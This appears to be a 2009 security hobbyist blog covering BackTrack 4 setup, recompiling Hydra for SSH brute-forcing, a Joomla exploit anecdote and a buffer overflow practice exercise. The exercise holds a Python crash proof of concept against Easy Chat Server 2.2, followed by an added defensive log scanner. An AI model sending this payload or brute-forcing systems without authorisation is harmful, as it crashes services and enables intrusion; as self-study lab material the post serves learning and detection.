2009
09.26

Little updates…

Some new, and not so new things to mention.

Firstly, Offensive Security’s Metasploit Unleashed.
The course material, available free of charge
here, is finally out. Sometime next month the exam and an additional course video will be made available for a small fee. It must be mentioned that the money raised by this course is donated to the “I Hack for Charity” created by Johnny Long. So by taking the course, you are not only learning to use a valuable penetration testing and assessment tool, you are also giving to a good cause.

A quick note on how to update Backtrack 4's kernel.

root@bt4# apt-get update
root@bt4# apt-get install -d linux-image
root@bt4# cd /var/cache/apt/archives/
root@bt4# dpkg -i --force-all linux-image-2.6.30.5_2.6.30.5-10.00.Custom_i386.deb
root@bt4# apt-get dist-upgrade
I suggest a reboot here to see if all is good (you should see 2 kernels available at the GRUB screen)
root@bt4# apt-get remove --purge 2.6.29*
root@bt4# reboot

Again with Backtrack 4: if you plan on using Hydra (or XHydra) against SSH, you might be in for a little surprise. The stock version of Hydra distributed on BT4 is not compiled with the necessary SSH libraries, so you'll need to recompile it. I found a nice how-to on the Remote Exploit forum (full thread). The same goes for Medusa, so that needs redoing as well…

# Download the hydra source, untar it, etc.
# ./configure
# nano Makefile
Edit the following lines to look like this; POSTGRES appears to be screwing stuff up in my case.
XDEFINES= -DLIBOPENSSL -DLIBSSH
XLIBS= -lssl -lssh -lcrypto

# make
# make install

If this doesn’t work, do what I did… Download the library and read the error messages. It’s all clearly explained…

----

A quick note: another Joomla exploit was released not too long ago (no big surprise), but what makes me mention it is the timing. Seeing that I work for an ISP and web/application hosting company, being aware of these things can sometimes come in handy.
Two days after this exploit was published, one of our partners asked me for a web space set up with Joomla. The boss told me to make it happen; knowing it was full of vulnerabilities, he said
“…put the latest version please…”.
In response: “Sure, no problem, but I just have to tell you that a remote exploit came out for that version 2 days ago”.
It hasn't been installed.

Sometimes the power of knowledge and a little assurance in one's speech can go a long way.

2009
09.12

BoF Exercise

Something I enjoy doing, and which helps in understanding buffer overflows and exploit coding, is practice.

Grab a known vulnerable application, find a PoC (proof of concept) and start from there. Here's a start for anyone trying. Had loads of fun with this one:
Easy Chat Server 2.2

- First, find and download the application (the trial version should do fine); try -this-
- Install the application (make sure it works)
- Get a debugger (I suggest OllyDbg)
- Copy and paste this PoC; it's Python, but you can rewrite it in a language you may be more familiar with. Remember to change the IP/port settings to your own Easy Chat Server
[this is based on his0k4's exploit on Exploit-DB]
==================================================
#!/usr/bin/python
# Bug:
# EFS Easy Chat Server Authentication Request
# Buffer Overflow Exploit (SEH)
# Crash PoC: sends an oversized username and password to chat.ghp

import struct  # unused in this crash PoC, kept from the original
import socket

# 600 bytes of 'A' (0x41) in each field
buffer = '\x41' * 600

# change these to your own Easy Chat Server instance
target_host = '192.168.1.200'
target_port = 8080

head = "GET /chat.ghp?username=" + buffer + "&password=" + buffer + "&room=1 HTTP/1.1\r\n"
head += "Host: " + target_host + "\r\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_host, target_port))
s.send((head + "\r\n\r\n").encode())  # .encode() keeps this working on Python 3 as well
s.close()
==================================================

Got this to work under Windows XP Pro SP3 English. Good practice…
Use the links I provided in a previous post and have fun.

Good luck
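From the defender's side, the request above has a very recognisable shape: a GET to /chat.ghp with a username or password parameter hundreds of bytes long. The following is an added example (not from the original post or from his0k4's PoC) that scans web server log lines for that pattern; the log lines and the 64-byte field threshold are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate chat logins are short; the PoC sends 600 bytes per field.
MAX_FIELD_LEN = 64

# Constructed sample log lines in common log format (not real traffic).
SAMPLE_LOG = """\
192.168.1.50 - - [26/Sep/2009:10:00:01 +0000] "GET /chat.ghp?username=alice&password=secret&room=1 HTTP/1.1" 200 512
192.168.1.77 - - [26/Sep/2009:10:00:05 +0000] "GET /chat.ghp?username=%s&password=%s&room=1 HTTP/1.1" 500 0
192.168.1.50 - - [26/Sep/2009:10:00:09 +0000] "GET /index.html HTTP/1.1" 200 2048
""" % ("A" * 600, "A" * 600)

# client ip, method and request target from a common-log-format line
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"')


def suspicious_fields(request_target):
    """Return the names of chat.ghp query fields longer than MAX_FIELD_LEN."""
    parts = urlsplit(request_target)
    if not parts.path.endswith("/chat.ghp"):
        return []
    params = parse_qs(parts.query, keep_blank_values=True)
    return sorted(name for name, values in params.items()
                  if any(len(v) > MAX_FIELD_LEN for v in values))


def scan_log(text):
    """Return (client_ip, oversized_fields) for each request matching the overflow shape."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not well-formed access log entries
        ip, method, target = m.groups()
        fields = suspicious_fields(target)
        if fields:
            hits.append((ip, fields))
    return hits


if __name__ == "__main__":
    for ip, fields in scan_log(SAMPLE_LOG):
        print("possible overflow attempt from %s: oversized %s" % (ip, ", ".join(fields)))
```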

2009
09.07

BoF explained

Well, it's been a while since I've posted. Family and work are taking most of my time. I also started practicing with exploit code and buffer overflows: taking an application with a known vulnerability, then starting from a working PoC and writing an exploit from there.

I would love to take the time to write up my experiences on this matter, but seeing that there are hundreds of websites and posts on the subject, I'll just post 2 of my favorites. Well written and very understandable.

Peter Van Eeckhoutte’s blog
i-Hacked.com's article on SEH BoFs

Enjoy…